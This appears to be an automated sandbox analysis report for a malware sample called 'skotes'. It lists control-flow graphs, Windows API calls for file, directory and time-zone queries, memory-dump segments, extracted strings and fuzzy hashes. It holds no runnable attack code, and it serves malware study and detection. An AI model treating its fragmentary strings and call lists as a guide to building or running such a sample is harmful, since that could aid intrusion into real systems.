Hash Concurrency::details::_CancellationTokenState::_RegisterCallback 38273->38275 38279 607430 38273->38279 38276->38266 38277->38272 38278->38262 38280 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38279->38280 38281 607465 38280->38281 38282 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38281->38282 38283 607478 38282->38283 38284 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38283->38284 38285 607488 38284->38285 38286 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38285->38286 38287 60749d 38286->38287 38288 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38287->38288 38289 6074b2 38288->38289 38290 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38289->38290 38291 6074c4 Hash __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38290->38291 38328 636dda 38329 636df6 38328->38329 38330 636de8 38328->38330 38332 63698d __wsopen_s 2 API calls 38329->38332 38331 636e4c 8 API calls 38330->38331 38333 636df2 38331->38333 38334 636e10 38332->38334 38335 6368ed __wsopen_s RtlAllocateHeap 38334->38335 38336 636e1d 38335->38336 38338 636e24 __freea 38336->38338 38339 636e4c 38336->38339 38340 636e77 ListArray 38339->38340 38346 636e5a __dosmaperr ___std_exception_copy 38339->38346 38341 636eb9 CreateFileW 38340->38341 38347 636e9d __dosmaperr ___std_exception_copy 38340->38347 38342 636eeb 38341->38342 38343 636edd 38341->38343 38362 636f2a GetPEB RtlAllocateHeap GetPEB __dosmaperr 38342->38362 38350 636fb4 GetFileType 38343->38350 38346->38338 38347->38338 38348 636ee6 ListArray 38348->38347 38349 636f1c CloseHandle 38348->38349 38349->38347 38351 636fef ListArray 38350->38351 38361 637085 __dosmaperr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38350->38361 38352 637028 GetFileInformationByHandle 38351->38352 38351->38361 38353 63703e 38352->38353 38352->38361 38363 63727c 38353->38363 38357 63705b 38358 637124 SystemTimeToTzSpecificLocalTime 38357->38358 38359 63706e 38358->38359 38360 637124 SystemTimeToTzSpecificLocalTime 38359->38360 38360->38361 38361->38348 38362->38348 38364 637292 _wcsrchr 38363->38364 38372 63704a 38364->38372 38377 63bc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 38364->38377 38366 6372d6 38366->38372 38378 63bc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 38366->38378 38368 6372e7 38368->38372 38379 63bc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 38368->38379 38370 6372f8 38370->38372 38380 63bc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 38370->38380 38373 637124 38372->38373 38374 63713c 38373->38374 38375 63715c SystemTimeToTzSpecificLocalTime 38374->38375 38376 637142 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38374->38376 38375->38376 38376->38357 38377->38366 38378->38368 38379->38370 38380->38372

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 188 60e530-60e843 call 617a00 call 605c10 call 617a00 call 605c10 call 619280 call 618320 call 618220 call 618320 call 617a00 * 3 call 60be30 call 617a00 * 2 call 605c10 call 608580 226 60ea1a-60ea62 188->226 227 60e8ce-60e9ec 188->227 226->227 230 60ea8f-60ea96 call 61d663 226->230 236 60ea99-60eab2 call 61cff1 227->236 237 60e9f2-60e9fe 227->237 230->236 237->230 239 60ea04-60ea12 237->239 239->226 241 60eab8-60eda3 call 636c6a * 2 call 617a00 call 605c10 call 6183c0 call 618220 GetFileAttributesA call 617a00 call 605c10 call 6183c0 call 618220 GetFileAttributesA 239->241 271 60eda9-60ee79 241->271 276 60f273-60f28b 271->276 277 60f5bb-60f66c call 6180c0 271->277 278 60f291-60f29d 276->278 279 60f6a3-60f6b6 276->279 277->276 282 60f699-60f6a0 call 61d663 277->282 281 60f2a3-60f2b1 278->281 278->282 281->277 285 60f6cb-60f962 call 636c6a call 617a00 call 605c10 call 617a00 * 4 call 60e530 call 6180c0 call 617a00 call 6180c0 * 2 281->285 282->279 320 60f964-60f970 285->320 321 60f98c-60f9a5 call 61cff1 285->321 322 60f982-60f989 call 61d663 320->322 323 60f972-60f980 320->323 322->321 323->322 325 60f9ab-60fb15 call 636c6a call 617a00 call 605c10 call 617a00 * 4 call 60e530 323->325 350 60fb17-60fb23 325->350 351 60fb3f-60fb4e 325->351 352 60fb35-60fb3c call 61d663 350->352 353 60fb25-60fb33 350->353 352->351 353->352 354 60fb4f-60fc6f call 636c6a call 617a00 call 609580 call 609230 call 618320 353->354 370 60fc70-60fc75 354->370 370->370 371 60fc77-610860 call 6180c0 call 617a00 * 2 call 60c360 call 636729 call 617a00 call 605c10 call 617a00 * 4 call 60e530 370->371 406 610862-61086e 371->406 407 61088a-6108a5 call 61cff1 371->407 408 610880-610887 call 61d663 406->408 409 610870-61087e 406->409 408->407 409->408 411 6108ce-611537 call 636c6a call 617a00 call 605c10 call 617a00 * 4 call 60e530 409->411
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1f$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                                                                            • API String ID: 0-2850511205
                                                                                                                                                                                            • Opcode ID: 2fd502c728b806eed6f8982a3630c25e7ae5bd618220615b4fa35de85fc696cc
                                                                                                                                                                                            • Instruction ID: b55ae2bdfb8bf1bda746c33d24a76f3e72e26dbe2a3bd4b8c2f1a6643aeded37
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fd502c728b806eed6f8982a3630c25e7ae5bd618220615b4fa35de85fc696cc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5282C170A042889BEF18DF68C9497DE7FB7AF46304F548588E805673C2C7B55A88CBD6

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1726 642517-64253f call 642133 call 642191 1731 6426e5-64271a call 636c87 call 642133 call 642191 1726->1731 1732 642545-642551 call 642139 1726->1732 1755 642720-64272c call 642139 1731->1755 1756 642842-64289e call 636c87 call 6462ee 1731->1756 1732->1731 1737 642557-642562 1732->1737 1740 642564-642566 1737->1740 1741 642598-6425a1 call 63adf5 1737->1741 1744 642568-64256c 1740->1744 1751 6425a4-6425a9 1741->1751 1747 64256e-642570 1744->1747 1748 642588-64258a 1744->1748 1752 642584-642586 1747->1752 1753 642572-642578 1747->1753 1750 64258d-64258f 1748->1750 1757 642595 1750->1757 1758 6426e1-6426e4 1750->1758 1751->1751 1759 6425ab-6425cc call 63b04b call 63adf5 1751->1759 1752->1750 1753->1748 1754 64257a-642582 1753->1754 1754->1744 1754->1752 1755->1756 1766 642732-64273e call 642165 1755->1766 1776 6428a0-6428a6 1756->1776 1777 6428a8-6428ab 1756->1777 1757->1741 1759->1758 1774 6425d2-6425d5 1759->1774 1766->1756 1775 642744-642765 call 63adf5 GetTimeZoneInformation 1766->1775 1778 6425d8-6425dd 1774->1778 1793 642820-642841 call 64212d call 642121 call 642127 1775->1793 1794 64276b-64278c 1775->1794 1781 6428ee-642900 1776->1781 1780 6428ad-6428bd call 63b04b 1777->1780 1777->1781 1778->1778 1779 6425df-6425f1 call 63a1f1 1778->1779 1779->1731 1797 6425f7-64260a call 644b17 1779->1797 1799 6428c7-6428e0 call 6462ee 1780->1799 1800 6428bf 1780->1800 1783 642910 1781->1783 1784 642902-642905 1781->1784 1791 642915-64292a call 63adf5 call 61cff1 1783->1791 1792 642910 call 6426f2 1783->1792 1784->1783 1788 642907-64290e call 642517 1784->1788 1788->1791 1792->1791 1801 642796-64279d 1794->1801 1802 64278e-642793 1794->1802 1797->1731 1822 642610-642613 1797->1822 1818 6428e5-6428eb call 63adf5 1799->1818 1819 6428e2-6428e3 1799->1819 1810 6428c0-6428c5 call 63adf5 1800->1810 1803 6427af-6427b1 1801->1803 1804 64279f-6427a6 1801->1804 1802->1801 1813 6427b3-6427dc call 63ef17 call 63e926 1803->1813 1804->1803 1811 6427a8-6427ad 1804->1811 1825 6428ed 1810->1825 1811->1813 1838 6427de-6427e1 1813->1838 1839 6427ea-6427ec 1813->1839 1818->1825 1819->1810 1829 642615-642619 1822->1829 1830 64261b-642621 1822->1830 1825->1781 1829->1822 1829->1830 1834 642624-642631 call 638bbe 1830->1834 1835 642623 1830->1835 1843 642634-642639 1834->1843 1835->1834 1838->1839 1841 6427e3-6427e8 1838->1841 1842 6427ee-64280c call 63e926 1839->1842 1841->1842 1851 64280e-642811 1842->1851 1852 64281b-64281e 1842->1852 1845 642642-642643 1843->1845 1846 64263b-642640 1843->1846 1845->1843 1846->1845 1848 642645-642648 1846->1848 1849 642696-642699 1848->1849 1850 64264a-642661 call 638bbe 1848->1850 1854 6426a0-6426b4 1849->1854 1855 64269b-64269d 1849->1855 1861 642675-642677 1850->1861 1862 642663 1850->1862 1851->1852 1856 642813-642819 1851->1856 1852->1793 1857 6426b6-6426c6 call 644b17 1854->1857 1858 6426ca 1854->1858 1855->1854 1856->1793 1857->1731 1868 6426c8 1857->1868 1863 6426cd-6426df call 64212d call 642121 1858->1863 1861->1849 1867 642679-642689 call 638bbe 1861->1867 1865 642665-64266a 1862->1865 1863->1758 1865->1861 1869 64266c-642673 1865->1869 1875 642690-642694 1867->1875 1868->1863 1869->1861 1869->1865 1875->1849 1876 64268b-64268d 1875->1876 1876->1849 1877 64268f 1876->1877 1877->1875
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00656758), ref: 0064275C
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InformationTimeZone
                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time$Xge
                                                                                                                                                                                            • API String ID: 565725191-3925688217
                                                                                                                                                                                            • Opcode ID: a9862358f69fc45657a86131b709180ae28c67a895b23ec2bf404c0e3d9b37f5
                                                                                                                                                                                            • Instruction ID: 88f017188bb7fa28df39e214b7555074e0311871e88e49505f99c65746d94b5f
                                                                                                                                                                                            • Opcode Fuzzy Hash: a9862358f69fc45657a86131b709180ae28c67a895b23ec2bf404c0e3d9b37f5
                                                                                                                                                                                            • Instruction Fuzzy Hash: E5C11471A00206AFDB249F68DC61AEE7BABEF55350FB4005DF98197391EB308E45CB94

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0060EB51
                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000), ref: 0060EC83
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0060ED98
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
